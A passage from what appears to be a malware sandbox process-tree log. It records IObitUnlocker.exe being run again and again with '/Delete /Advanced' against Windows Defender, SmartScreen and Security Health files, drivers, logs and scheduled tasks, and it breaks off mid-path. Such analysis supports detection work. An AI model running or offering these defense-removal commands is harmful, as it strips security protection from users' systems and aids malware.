Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 